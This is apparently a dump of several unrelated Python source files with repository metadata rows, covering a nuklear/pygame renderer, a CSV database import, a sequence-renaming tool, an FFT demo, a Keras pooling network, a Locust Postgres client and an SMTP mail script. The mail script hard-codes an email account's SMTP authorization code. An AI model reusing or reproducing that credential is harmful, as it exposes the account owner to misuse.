        thrown. To use the instance, setup() must be called. This can be
        done manually or via a 'with' statement.
        """
        self.__font = font
        # Keep the cffi handle alive on the instance: nuklear only stores the
        # raw pointer, so dropping this reference would invalidate it.
        self.__font_handle = ffi.new_handle(font)
        self.__nuklear_font = ffi.new("struct nk_user_font*")
        self.__nuklear_font.userdata.ptr = self.__font_handle
        self.__nuklear_font.height = self.__font.height()
        self.__nuklear_font.width = lib.pynk_text_width_callback
        self.__nuklear_font.query = lib.pynk_query_font_glyph_callback
        self.__nuklear_font.texture.id = self.__font.get_texture_id()
        self.__ctx = None
    @property
    def ctx(self):
        """ Get the nuklear context. It must have been initialised via setup() first. """
        if self.__ctx is None:
            raise Exception("The nuklear context has not been initialised.")
        return self.__ctx
    def setup(self):
        """ Initialise the nuklear context. """
        # Idempotent: a second call while initialised is a no-op.
        if self.__ctx is None:
            self.__ctx = ffi.new("struct nk_context*")
            lib.nk_init_default(self.__ctx, self.__nuklear_font)
    def teardown(self):
        """ Tear down the nuklear context. """
        # Idempotent: safe to call on an already torn-down instance.
        if self.__ctx is not None:
            lib.nk_free(self.__ctx)
            self.__ctx = None
    def __enter__(self):
        "Support 'with' statement."
        self.setup()
        return self
    def __exit__(self, type, value, traceback):
        "Support 'with' statement."
        self.teardown()
    def handle_events(self, events):
        """ Handle a sequence of pygame events. """
        # nuklear requires input to be delivered between begin/end markers.
        lib.nk_input_begin(self.ctx)
        for e in events:
            self.handle_event(e)
        lib.nk_input_end(self.ctx)
    def handle_event(self, e):
        """ Map a pygame event to nuklear input. """
        if e.type == pygame.KEYDOWN or e.type == pygame.KEYUP:
            consumed = False
            down = e.type == pygame.KEYDOWN
            for nk_key in NkPygame.KEYMAP.map_key(e.key, e.mod):
                lib.nk_input_key(self.ctx, nk_key, down)
                consumed = True
            # Unmapped printable key presses are forwarded as text input.
            if not consumed and down and len(e.unicode) == 1:
                # Note: should pass unicode directly, but need to
                # convert wchar_t (which is what cffi converts to)
                # to int or char[4]. wchar_t is 2 bytes on windows
                # for utf-16
                # Skip control characters (Unicode general category "C*").
                if unicodedata.category(e.unicode)[0] != "C":
                    char = str(e.unicode)
                    if len(char) == 1:
                        lib.nk_input_char(self.ctx, str(e.unicode))
        elif e.type == pygame.MOUSEBUTTONDOWN or e.type == pygame.MOUSEBUTTONUP:
            down = e.type == pygame.MOUSEBUTTONDOWN
            # NOTE(review): middle button (2) and wheel events fall through to
            # NK_BUTTON_LEFT here - confirm that is intended.
            button = lib.NK_BUTTON_LEFT
            if e.button == 1:
                button = lib.NK_BUTTON_LEFT
            elif e.button == 3:
                button = lib.NK_BUTTON_RIGHT
            lib.nk_input_button(self.ctx, button, e.pos[0], e.pos[1], down)
        elif e.type == pygame.MOUSEMOTION:
            lib.nk_input_motion(self.ctx, e.pos[0], e.pos[1])
    def render_to_surface(self, screen):
        """
        Render the nuklear context to a pygame surface.
        'screen' is a pygame surface. This function will set the clip region and
        result in the clip region being set to None.
        """
        # Walk nuklear's command list, translating each draw command into the
        # closest pygame.draw primitive.
        nuklear_command = lib.nk__begin(self.ctx)
        while nuklear_command:
            if nuklear_command.type == lib.NK_COMMAND_NOP:
                pass
            elif nuklear_command.type == lib.NK_COMMAND_SCISSOR:
                # Scissor commands become the pygame clip rectangle.
                c = ffi.cast("struct nk_command_scissor*", nuklear_command)
                rect = pygame.Rect(c.x, c.y, c.w, c.h)
                screen.set_clip(rect)
            elif nuklear_command.type == lib.NK_COMMAND_LINE:
                c = ffi.cast("struct nk_command_line*", nuklear_command)
                pygame.draw.line(screen,
                                 (c.color.r, c.color.g, c.color.b),
                                 (c.begin.x, c.begin.y),
                                 (c.end.x, c.end.y),
                                 c.line_thickness)
            elif nuklear_command.type == lib.NK_COMMAND_RECT:
                c = ffi.cast("struct nk_command_rect*", nuklear_command)
                rect = pygame.Rect(c.x, c.y, c.w, c.h)
                colour = (c.color.r, c.color.g, c.color.b)
                # c.rounding - unsupported.
                pygame.draw.rect(screen, colour, rect, c.line_thickness)
            elif nuklear_command.type == lib.NK_COMMAND_RECT_FILLED:
                c = ffi.cast("struct nk_command_rect_filled*", nuklear_command)
                rect = pygame.Rect(c.x, c.y, c.w, c.h)
                colour = (c.color.r, c.color.g, c.color.b)
                # c.rounding - unsupported.
                pygame.draw.rect(screen, colour, rect, 0)
            elif nuklear_command.type == lib.NK_COMMAND_CIRCLE:
                c = ffi.cast("struct nk_command_circle*", nuklear_command)
                rect = pygame.Rect(c.x, c.y, c.w, c.h)
                colour = (c.color.r, c.color.g, c.color.b)
                pygame.draw.ellipse(screen, colour, rect, c.line_thickness)
            elif nuklear_command.type == lib.NK_COMMAND_CIRCLE_FILLED:
                c = ffi.cast("struct nk_command_circle_filled*", nuklear_command)
                rect = pygame.Rect(c.x, c.y, c.w, c.h)
                colour = (c.color.r, c.color.g, c.color.b)
                pygame.draw.ellipse(screen, colour, rect, 0)
            elif nuklear_command.type == lib.NK_COMMAND_TRIANGLE:
                c = ffi.cast("struct nk_command_triangle*", nuklear_command)
                points = [(c.a.x, c.a.y), (c.b.x, c.b.y), (c.c.x, c.c.y)]
                colour = (c.color.r, c.color.g, c.color.b)
                pygame.draw.polygon(screen, colour, points, c.line_thickness)
            elif nuklear_command.type == lib.NK_COMMAND_TRIANGLE_FILLED:
                c = ffi.cast("struct nk_command_triangle_filled*", nuklear_command)
                points = [(c.a.x, c.a.y), (c.b.x, c.b.y), (c.c.x, c.c.y)]
                colour = (c.color.r, c.color.g, c.color.b)
                pygame.draw.polygon(screen, colour, points, 0)
            elif nuklear_command.type == lib.NK_COMMAND_POLYGON:
                c = ffi.cast("struct nk_command_polygon*", nuklear_command)
                unpacked = ffi.unpack(c.points, c.point_count)
                points = [(p.x, p.y) for p in unpacked]
                colour = (c.color.r, c.color.g, c.color.b)
                pygame.draw.polygon(screen, colour, points, c.line_thickness)
            elif nuklear_command.type == lib.NK_COMMAND_POLYGON_FILLED:
                c = ffi.cast("struct nk_command_polygon_filled*", nuklear_command)
                unpacked = ffi.unpack(c.points, c.point_count)
                points = [(p.x, p.y) for p in unpacked]
                colour = (c.color.r, c.color.g, c.color.b)
                pygame.draw.polygon(screen, colour, points, 0)
            elif nuklear_command.type == lib.NK_COMMAND_POLYLINE:
                # NOTE(review): pygame.draw.polygon closes the outline, so an
                # open polyline is rendered with an extra closing edge
                # (pygame.draw.lines with closed=False would avoid that).
                c = ffi.cast("struct nk_command_polyline*", nuklear_command)
                unpacked = ffi.unpack(c.points, c.point_count)
                points = [(p.x, p.y) for p in unpacked]
                colour = (c.color.r, c.color.g, c.color.b)
                pygame.draw.polygon(screen, colour, points, c.line_thickness)
            elif nuklear_command.type == lib.NK_COMMAND_TEXT:
                # Text is drawn in software via the font's pygame font, if any.
                c = ffi.cast("struct nk_command_text*", nuklear_command)
                font = ffi.from_handle(c.font.userdata.ptr)
                pygame_font = font.get_pygame_font()
                if pygame_font is not None:
                    text = ffi.string(c.string, c.length)
                    fg_colour = (c.foreground.r, c.foreground.g, c.foreground.b)
                    bg_colour = (c.background.r, c.background.g, c.background.b)
                    rect = pygame.Rect(c.x, c.y, c.w, c.h)
                    rendered = pygame_font.render(text, True, fg_colour, bg_colour)
                    screen.blit(rendered, rect.topleft)
            # Curves, gradient rects, images and arcs are not implemented and
            # are silently skipped.
            elif nuklear_command.type == lib.NK_COMMAND_CURVE:
                pass
            elif nuklear_command.type == lib.NK_COMMAND_RECT_MULTI_COLOR:
                pass
            elif nuklear_command.type == lib.NK_COMMAND_IMAGE:
                pass
            elif nuklear_command.type == lib.NK_COMMAND_ARC:
                pass
            elif nuklear_command.type == lib.NK_COMMAND_ARC_FILLED:
                pass
            else:
                raise Exception("Unknown nuklear command type.")
            nuklear_command = lib.nk__next(self.ctx, nuklear_command)
        # Reset the clipping.
        screen.set_clip(None)
| [
"nathanrichardwoodward@gmail.com"
] | nathanrichardwoodward@gmail.com |
99d94813e88422173ededc851fc34356be9ae9fa | c5765671f488bad98e8a9458aa68a0d1bacb8bcb | /ingresar_instituciones.py | 6e426db1e65730a9fef883c91b42ef87c386935a | [] | no_license | PlataformasWeb-P-AA2021/trabajo-final-1bim-BrandonVS | de7b654c9b48add233e6ca303fda8b6bde821866 | 59489f8c508d3a412fc2b1583784b6419df34d0f | refs/heads/main | 2023-04-20T10:56:01.512136 | 2021-05-30T19:53:35 | 2021-05-30T19:53:35 | 371,237,758 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,522 | py | import csv
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from generar_tablas import Institucion, Parroquia
from configuracion import cadena_base
# Build the engine/session for the database configured in `configuracion`.
engine = create_engine(cadena_base)
Session = sessionmaker(bind=engine)
session = Session()
# Open the file that holds all of the source data.
read = open('data/Listado-instituciones-Educativas.csv', 'r', encoding='utf-8')
# Parse it with Python's csv module (pipe-delimited).
# NOTE(review): this rebinding shadows the imported `csv` module for the rest
# of the script.
csv = csv.reader(read, delimiter='|')
# Skip the header row.
next(csv)
# Materialise every remaining row into a list.
institucion_csv = list(csv)
cont = 0
# Keep only the columns relevant to institutions, as a tuple so rows become
# hashable (needed for the set() deduplication below).
for row in institucion_csv:
    institucion_csv[cont] = tuple(row[i] for i in [0, 1, 6, 8, 9, 10, 11, 12, 13, 14, 15])
    cont += 1
# Remove duplicates via set() and go back to a list for convenience.
instituciones = list(set(institucion_csv))
# Persist each row into the Institucion table; the parish is looked up by id.
# Committing inside the loop persists each institution individually.
for i in instituciones:
    i = Institucion(institucion_id=i[0], inst_name=i[1], distrito=i[3], sostenimiento=i[4], tipo_edu=i[5],
                    modalidad=i[6], jornada=i[7], acceso=i[8], n_estudiantes=int(i[9]), n_profesores=int(i[10]),
                    parroquia=session.query(Parroquia).filter_by(parroquia_id=i[2]).one())
    session.add(i)
    session.commit()
| [
"vegasotobrandon@yahoo.com"
] | vegasotobrandon@yahoo.com |
83774ee8ba86d36addb91c1a11753509b4785fd5 | 16a2ac198a36d7633c62d41f4604356cd0ae732e | /Au-public-master/iron/utilities/rename_to_pacbio.py | 7b73810b42d4d374c9af78099e87739af78271c2 | [
"Apache-2.0"
] | permissive | Dingjie-Wang/Manual-for-running-IDP-pipeline | f433ba5b0dbd44da5a9d8836b3e29a27e12a48c4 | 6c2756e10184f0b8f0e5872a358378e90f1729b0 | refs/heads/master | 2021-06-29T04:02:56.741203 | 2020-12-07T17:39:05 | 2020-12-07T17:39:05 | 201,325,604 | 1 | 7 | null | null | null | null | UTF-8 | Python | false | false | 1,878 | py | #!/usr/bin/python
import sys,argparse
from SequenceBasics import FastaHandleReader, FastqHandleReader
def main():
  """Rename FASTA/FASTQ/genePred record names to synthetic PacBio CCS names.
  Reads records from a file or STDIN, rewrites each name to
  m150101_010101_..._s1_p0/<n>/ccs, writes the renamed records to --output
  (or STDOUT), and optionally writes an old-name -> new-name table via
  --output_table.
  """
  parser = argparse.ArgumentParser()
  parser.add_argument('input',help="Use - for STDIN")
  group = parser.add_mutually_exclusive_group(required=True)
  group.add_argument('--fasta',action='store_true')
  group.add_argument('--fastq',action='store_true')
  group.add_argument('--gpd',action='store_true')
  parser.add_argument('--output_table',help='save coversion to file')
  parser.add_argument('-o','--output')
  args = parser.parse_args()
  if args.input=='-': args.input = sys.stdin
  else: args.input= open(args.input)
  # Bug fix: the stdout fallback used to hang off the --output_table check,
  # so `-o` without --output_table silently redirected output to stdout and
  # --output_table without `-o` crashed because args.output stayed None.
  if args.output: args.output = open(args.output,'w')
  else: args.output = sys.stdout
  if args.output_table: args.output_table = open(args.output_table,'w')
  if args.gpd:
    # genePred: columns 0 and 1 carry the name; record the mapping before
    # overwriting them.
    z = 0
    for line in args.input:
      f = line.rstrip().split("\t")
      z+=1
      name = 'm150101_010101_11111_c111111111111111111_s1_p0/'+str(z)+'/ccs'
      if args.output_table: args.output_table.write(f[0]+"\t"+name+"\n")
      f[0] = name
      f[1] = name
      args.output.write("\t".join(f)+"\n")
    args.output.close()
    if args.output_table:
      args.output_table.close()
    return
  if args.fasta:
    args.input = FastaHandleReader(args.input)
  elif args.fastq:
    args.input = FastqHandleReader(args.input)
  z = 0
  while True:
    e = args.input.read_entry()
    if not e: break
    z+=1
    name = 'm150101_010101_11111_c111111111111111111_s1_p0/'+str(z)+'/ccs'
    if args.fastq:
      # Bug fix: the '+' separator and quality string belong on separate
      # lines in FASTQ; they used to be fused into a single '+<qual>' line.
      args.output.write('@'+name+"\n"+e['seq']+"\n"+"+\n"+e['qual']+"\n")
    elif args.fasta:
      args.output.write('>'+name+"\n"+e['seq']+"\n")
    if args.output_table: args.output_table.write(e['name']+"\t"+name+"\n")
  args.output.close()
  if args.output_table: args.output_table.close()
if __name__=="__main__":
main()
| [
"wan251@osumc.edu"
] | wan251@osumc.edu |
f06431d13f551b2af20f90fdde428236b8cc7d8d | cf8b9a860bdce11bc32bece7595db8b5af397968 | /Activities/migrations/0002_auto_20170921_1411.py | 4ba80207af6f940a09eb0129b7a5eb112fc65cca | [] | no_license | BhumitThakkar/JalaBapa_Website-Python | 9e425a18ddd2b9b46ea3a051dec81f9f429efb40 | 36210b39584950eb1eeed11d018345db81ff41ed | refs/heads/master | 2020-03-18T03:18:02.211978 | 2018-05-21T21:36:02 | 2018-05-21T21:36:02 | 134,233,495 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,115 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-09-21 19:11
from __future__ import unicode_literals
from django.db import migrations, models
import multiselectfield.db.fields
class Migration(migrations.Migration):
    """Relaxes Activities fields: nullable poster/status/week_days with fixed choice sets."""
    dependencies = [
        ('Activities', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='activities',
            name='poster',
            field=models.FileField(null=True, upload_to=''),
        ),
        migrations.AlterField(
            model_name='activities',
            name='status',
            field=models.CharField(choices=[('Past', 'Past'), ('Current', 'Current'), ('Upcoming', 'Upcoming')], max_length=10, null=True),
        ),
        migrations.AlterField(
            model_name='activities',
            name='week_days',
            # MultiSelectField stores the chosen weekday names as one comma-separated string.
            field=multiselectfield.db.fields.MultiSelectField(choices=[('Sunday', 'Sunday'), ('Monday', 'Monday'), ('Tuesday', 'Tuesday'), ('Wednesday', 'Wednesday'), ('Thursday', 'Thursday'), ('Friday', 'Friday'), ('Saturday', 'Saturday')], max_length=56, null=True),
        ),
    ]
| [
"thakkarbhumit.1@gmail.com"
] | thakkarbhumit.1@gmail.com |
3c08dbf8205234af453c36af0cbb88df3835928a | f01ddf9bb2aed0a6dd761856efa52a80d7c1458f | /AprendizajeAutomatico/Practica2/codigoPC/daq2/FFTTest.py | 2d64621224bddc343bea0b0d881f8b2285a773ec | [] | no_license | luisf10/MCCP | 7fcf07a180253851ffea6b7517dd746fddd47aba | 884c0782a889ffa70a59ca06fce1bb0b418d982b | refs/heads/main | 2023-04-26T19:50:14.467402 | 2021-05-17T07:22:12 | 2021-05-17T07:22:12 | 346,027,749 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 787 | py | #LINK: https://www.youtube.com/watch?v=O0Y8FChBaFU&t=782s
import numpy as np
import matplotlib.pyplot as plt
Fs=2000  # sampling frequency in Hz
tstep=1/Fs  # time between samples
fo=100 #signal freq
N=int(10*Fs/fo) #number of samples (ten periods of the fundamental)
t=np.linspace(0,(N-1)*tstep,N) #time steps
fstep=Fs/N #freq interval (FFT bin width)
f=np.linspace(0,(N-1)*fstep,N)
# Test signal: fundamental at fo plus its third harmonic, both amplitude 1.
y=1*np.sin(2*np.pi*fo*t) + 1*np.sin(2*np.pi*3*fo*t)
print("long de y={0}, N={1}".format(len(y),N))
#..Compute the FFT and normalise magnitudes by N...............
X=np.fft.fft(y)
X_mag=np.abs(X)/N
#...Keep the one-sided (positive-frequency) half; double the magnitudes to
# account for the discarded negative-frequency half:...
f_plot=f[0:int(N/2+1)]
X_mag_plot=2*X_mag[0:int(N/2+1)]
X_mag_plot[0]=X_mag_plot[0]/2 #Note:DC components does not need to multiply by 2
#.........Plot time-domain signal (top) and spectrum (bottom)
fig,[ax1,ax2] = plt.subplots(nrows=2,ncols=1)
ax1.plot(t,y,'.-')
ax2.plot(f_plot,X_mag_plot,'.-')
plt.grid('on')
plt.show()
| [
"noreply@github.com"
] | luisf10.noreply@github.com |
788ba68bb541eb2b7cf33cc4827202b39f5bc269 | 059c3bb5e0e8552f09768c3442b7af8614ca72f6 | /Lab7/CodingBat/Warmup-1/front_back.py | 8672e8714a693fbf13134795ee19b9c062298ddc | [] | no_license | tdinaraa/WebDev | 04ac88369cdf14e199841caf08a90723e73b4ccf | b99bdb93756b6a63b2835c0eee5b8d24309f7e00 | refs/heads/master | 2023-01-22T08:32:06.405670 | 2020-04-22T04:32:53 | 2020-04-22T04:32:53 | 240,984,305 | 0 | 0 | null | 2023-01-07T21:54:04 | 2020-02-16T23:41:57 | null | UTF-8 | Python | false | false | 147 | py | def front_back(str):
if len(str) <= 1:
return str
mid = str[1:-1]
f = str[0]
l = str[len(str) - 1]
return l + mid + f | [
"45028995+tdinaraa@users.noreply.github.com"
] | 45028995+tdinaraa@users.noreply.github.com |
4622243a0d9aaf94e1770a284c8ba2b006e76181 | 40d932cf54364808d1f752d411a2d030d92bd5e2 | /docker-image/locust-tasks/postgres_client.py | 3e7c356cb2af4940bd1506bbba647dd318c63e38 | [
"Apache-2.0"
] | permissive | yroket/distributed-load-testing-using-kubernetes | 7fa417ef86f16b05ce5ba11f715bdfcae6124fe8 | ed2b83d942cbb1c6ddab1789d7cf4d9076ea151e | refs/heads/master | 2021-10-20T03:41:22.853456 | 2019-02-25T12:50:25 | 2019-02-25T12:50:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,267 | py | import time
from locust import events
from sqlalchemy import create_engine
from sqlalchemy.engine import url
from sqlalchemy import event
from argparse import ArgumentParser
class PostgresClient:
    """SQL execution helper that reports per-query timings to Locust.
    Wraps a SQLAlchemy engine; every send() runs one statement and fires a
    Locust request_success / request_failure event carrying the elapsed
    wall-clock time in milliseconds.
    """
    def __init__(self, connection_string, request_type='pg8000'):
        """Create the engine from a SQLAlchemy connection string."""
        self.request_type = request_type
        self.engine = create_engine(connection_string)
    def send(self, name, query, values=None):
        """Execute `query` (with optional bind `values`) and report timing.
        Returns the SQLAlchemy result on success; on any exception the
        failure is printed, reported to Locust, and None is returned.
        """
        started = time.time()
        try:
            result = self.engine.execute(query, values)
            elapsed_ms = int((time.time() - started) * 1000)
            events.request_success.fire(request_type=self.request_type,
                                        name=name,
                                        response_time=elapsed_ms,
                                        response_length=len(str(result)))
            return result
        except Exception as e:
            print('Exception occurred: ' + str(e))
            elapsed_ms = int((time.time() - started) * 1000)
            events.request_failure.fire(request_type=self.request_type,
                                        name=name,
                                        response_time=elapsed_ms,
                                        exception=e)
    def finalize(self):
        """Log the flush hooks; the flush itself is a no-op (apparently a
        leftover from a producer-based client this code was adapted from)."""
        print("flushing the messages")
        print("flushing finished")
| [
"ygolan@Ygolan-6830.local"
] | ygolan@Ygolan-6830.local |
0acc131c78b11be11c1de6b9132faa40c9935bb7 | 0be96465a1c0acd6b5a29080ca75a56d7d2c88a8 | /mailv03.py | 0e2be9b67e235814d4452af07fec97fe2f18c7ec | [] | no_license | KenZP/tulingxueyuan | 975dd9d92127005d89e69ec063efac83e71d5910 | 458ebc9aabe3a0854141c7f1ad6a7a0c3d58ecae | refs/heads/master | 2020-05-05T14:05:39.882969 | 2019-05-08T07:06:13 | 2019-05-08T07:06:13 | 180,106,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,396 | py | import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEBase,MIMEMultipart
# Build a multipart message: plain-text body plus one attachment.
mail_mul = MIMEMultipart()
mail_text = MIMEText("hello, i am ......","plain","utf-8")
mail_mul.attach(mail_text)
# Attach 02.html as a base64-encoded binary attachment.
with open("02.html", "rb") as f:
    s = f.read()
    m = MIMEText(s,'base64',"utf-8")
    m["Content-Type"] = "application/octet-stream"
    m["Content-Disposition"] = "attachment; filename='02.html'"
    mail_mul.attach(m)
# Sender email address.
from_addr = "1366798119@qq.com"
# This is the SMTP authorization code obtained from the provider, not the
# mailbox password.
# SECURITY NOTE(review): a credential is hard-coded here; it should be moved
# to an environment variable or config file and the exposed code revoked.
from_pwd = "hjpovygcxmrshhcj"
to_addr = "1366798119@qq.com"
# SMTP server address - this varies by mail provider.
# Most providers require enabling third-party access / an authorization code
# before SMTP clients may send mail.
# Tencent QQ Mail uses smtp.qq.com.
smtp_srv = "smtp.qq.com"
try:
    # SMTP_SSL takes two arguments here:
    # 1. the server address (encoded to bytes in this code)
    # 2. the server port
    srv = smtplib.SMTP_SSL(smtp_srv.encode(),465) # plain SMTP defaults to port 25; 465 is SMTP over SSL
    # Log in to the sending mailbox.
    srv.login(from_addr,from_pwd)
    # sendmail takes three arguments:
    # 1. the sender address
    # 2. the recipient addresses, which must be a list
    # 3. the message content, sent as a string
    srv.sendmail(from_addr,[to_addr],mail_mul.as_string())
    srv.quit()
except Exception as e:
    print(e)
| [
"398984762@qq.com"
] | 398984762@qq.com |
e9162ffce76e6cb45f8be7473bdfb2cc410f65fd | 007d72285632bb7c48adf52dab62093f4d3fcb6e | /model.py | 568caa7301a28fb2e77b01495d5977dec5ec93d7 | [] | no_license | hzwfl2/dilute-pooling-network | 497cd0a9afd92532c3a47e00621c7a4c1f8b8f37 | b65c1a222bcefb764ac4e8b4a4de05cafc2430d1 | refs/heads/master | 2020-06-23T20:32:32.952874 | 2019-07-08T12:18:42 | 2019-07-08T12:18:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,401 | py | # model script
"""
@author: mengxue.Zhang
"""
from keras.models import Model
from keras.optimizers import Adam
from keras import losses
from keras.layers import Dropout, Activation, add, Input, Concatenate , Lambda, Reshape
from keras.layers import Conv2D, MaxPooling2D
image_shape=[88, 88]
channel = 1
padding = 'valid'
def get_model(classes=10, lr=0.001):
    """Endless generator of freshly built and compiled DP networks.
    Each iteration constructs a new DP_model over the module-level input
    geometry (image_shape x channel) and compiles it for sparse categorical
    classification with an Adam optimiser at the requested learning rate.
    """
    while True:
        network = DP_model(width=image_shape[0], height=image_shape[1],
                           channel=channel, classes=classes)
        network.compile(loss=losses.sparse_categorical_crossentropy,
                        optimizer=Adam(lr=lr, decay=0.0),
                        metrics=['accuracy'])
        yield network
def DP_model(width, height, channel, classes):
    """Build the dilute-pooling CNN as a Keras functional Model.
    Alternates 5x5/6x6 convolutions with Rectified_Pooling stages, then
    reduces to `classes` channels and applies a softmax.
    Note: the final Reshape([classes]) only works when the spatial size has
    collapsed to 1x1 - presumably this assumes the module-level 88x88 input;
    other sizes would need different kernel sizes (TODO confirm).
    """
    inpt = Input(shape=(width, height, channel), name='0_input')
    x = Conv2D(16, kernel_size=(5, 5), padding=padding, activation='relu', name='1_conv')(inpt)
    x = Rectified_Pooling(inpt=x, filters=16, couple=False)
    x = Conv2D(32, kernel_size=(5, 5), padding=padding, activation='relu', name='2_conv')(x)
    x = Rectified_Pooling(inpt=x, filters=32, couple=False)
    x = Conv2D(64, kernel_size=(6, 6), padding=padding, activation='relu', name='3_conv')(x)
    x = Rectified_Pooling(inpt=x, filters=64, couple=True)
    x = Conv2D(128, kernel_size=(5, 5), padding=padding, activation='relu', name='4_conv')(x)
    x = Dropout(rate=0.5)(x)
    # Final conv maps straight to class logits; no activation until softmax.
    x = Conv2D(classes, kernel_size=(3, 3), padding=padding, activation=None, name='5_conv')(x)
    x = Reshape([classes])(x)
    x = Activation('softmax')(x)
    models = Model(inputs=inpt, outputs=x)
    return models
def Rectified_Pooling(inpt, ps=2, filters=32, add_max=True, couple=False, dropout=True):
    """Dilute-pooling block: learned pooling added to max pooling.
    Splits the input into ps*ps phase-shifted subsampled grids, concatenates
    them on the channel axis, mixes them with a 1x1 convolution, and (by
    default) adds the result to a standard ps x ps max pool.
    NOTE(review): the Lambda closures capture `i`/`j` by reference; this is
    fine while the graph is built eagerly here, but re-instantiating the
    lambdas later (e.g. model deserialization) would see the final loop
    values - confirm before saving/loading this model architecture.
    """
    # Assumes square spatial input; only dimension 1 is inspected.
    input_size = inpt.get_shape()[1]
    xmax = MaxPooling2D(pool_size=(ps, ps), strides=(ps, ps), name=str(filters)+'_max')(inpt)
    xs = []
    for i in range(ps):
        for j in range(ps):
            # Each (i, j) offset picks one phase of the strided subsampling.
            x_ = Lambda(lambda x: x[:, i:input_size:ps, j:input_size:ps, :])(inpt)
            xs.append(x_)
    xs = Concatenate(axis=-1)(xs)
    if couple:
        xs = Dropout(rate=0.5)(xs)
    # linear combination
    xs = Conv2D(filters, kernel_size=(1, 1), padding=padding, activation=None, name=str(filters)+'_1conv1')(xs)
    if dropout:
        xs = Dropout(rate=0.5, name=str(filters)+'_delta')(xs)
    if add_max:
        xs = add(inputs=[xs, xmax], name=str(filters)+'_sum')
    else:
        xs = xs
    return xs
| [
"mengxuez@yahoo.com"
] | mengxuez@yahoo.com |
11ace4adaf7b2348cdcb2bfda968fe574e5e91c5 | 516136cf8984312019edde657e93a338cce064f3 | /DCP_520.py | 71e42c2136934b79a9504b1f5bb259dfd1a69dff | [] | no_license | christiangalleisky/DailyCodingProblems500-550 | 4db4388f64c748294431e60ba5a8cde1790ae01a | db4e6b0a547e76258ce024c55d1748be017a78bb | refs/heads/master | 2022-12-17T16:58:39.838303 | 2020-09-20T17:32:14 | 2020-09-20T17:32:14 | 290,891,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | def find_depth(tree):
depth = 0
while tree != '0':
tree = tree.replace('(00)', '0')
depth += 1
return depth
def find_depth_Ntime(tree):
    """Compute tree depth in a single O(n) scan.
    The depth of the encoded tree equals the deepest level of parenthesis
    nesting seen anywhere in the string.
    """
    deepest = 0
    level = 0
    for ch in tree:
        if ch == '(':
            level += 1
            if level > deepest:
                deepest = level
        elif ch == ')':
            level -= 1
    return deepest
| [
"noreply@github.com"
] | christiangalleisky.noreply@github.com |
0103ac6ed6f9aed7945817632289d3a4061d141c | 7fa283fc8a791cd85c35766952a352955c2b6b46 | /videorecs/recommend/migrations/0007_question.py | e3305e7d30fb6d2b0ca8da5223b825284d24da67 | [] | no_license | mpdominguez/personalize-video-recs | 8785b24fea5967b11bc268fb06c72c246f8df47f | 1bb9d86ba03db8ef862b7cad16c22d768b69a6f0 | refs/heads/master | 2020-07-07T22:29:38.273861 | 2019-08-21T19:14:10 | 2019-08-21T19:14:10 | 203,494,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 675 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-05-01 12:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('recommend', '0006_reviews_timestamp'),
]
operations = [
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
]
| [
"mpdominguez@gmail.com"
] | mpdominguez@gmail.com |
359c2822e71c348ed169b57f8aa3b16971915434 | 5c4838565656a75b09502e6e60c7d78c8b196133 | /crawler/baike_spider/html_download.py | 0b0b78227a28ce428b8839a142df963fff3c8e0f | [] | no_license | huangshengda/toys | e2e1c2539df1d9f5c7df2431f3343e2a7017edf4 | 374c8ec60f3acbb479954d8202d74c97660ac158 | refs/heads/master | 2020-04-01T09:16:44.352742 | 2018-07-07T07:07:53 | 2018-07-07T07:07:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | import urllib.request
class HtmlDownloader(object):
    """Downloads raw page content over HTTP using urllib."""
    def download(self, url):
        """Fetch `url` and return the response body as bytes.
        Returns None when `url` is None or the server does not answer with
        HTTP status 200.  The response is closed via a context manager so
        the underlying connection is not leaked (the original left it open).
        """
        if url is None:
            return None
        with urllib.request.urlopen(url) as response:
            if response.getcode() != 200:
                return None
            return response.read()
| [
"490641570@qq.com"
] | 490641570@qq.com |
fdc482ebab30deb95941025999cd0e9ef8238969 | b6cf41b1eadb6571e30998712da651ec62db07ad | /Gui/TextEdit.py | ceb67896e0bb84b333873a5b082f3dbedb16f3f7 | [] | no_license | fdanesse/CoralEditor | 8d1949ff86af61d44d573d544a3b76dbc182b5d4 | e42239f75ee921c99d13e60758b32ca5862c303f | refs/heads/master | 2021-08-14T07:14:19.203753 | 2017-11-15T00:06:11 | 2017-11-15T00:06:11 | 107,883,737 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,380 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QEvent
from PyQt5.QtWidgets import QPlainTextEdit
from PyQt5.QtWidgets import QApplication
from PyQt5.QtGui import QPalette
from PyQt5.QtGui import QColor
from PyQt5.QtGui import QFont
from PyQt5.QtGui import QFontMetrics
from PyQt5.QtGui import QTextCharFormat
from PyQt5.QtGui import QKeyEvent
#from PyQt5.QtGui import QTextCursor
#from Gui.Syntax.PythonHighlighter import PythonHighlighter
class TextEdit(QPlainTextEdit):
# https://doc.qt.io/qt-5/qplaintextedit.html
# https://github.com/hugoruscitti/pilas/blob/e33bfd80a9c9faec432dbd3de1d82066b8704303/pilasengine/interprete/editorbase/editor_base.py
# http://www.binpress.com/tutorial/developing-a-pyqt-text-editor-part-2/145
# http://ftp.ics.uci.edu/pub/centos0/ics-custom-build/BUILD/PyQt-x11-gpl-4.7.2/doc/html/qtextedit.html
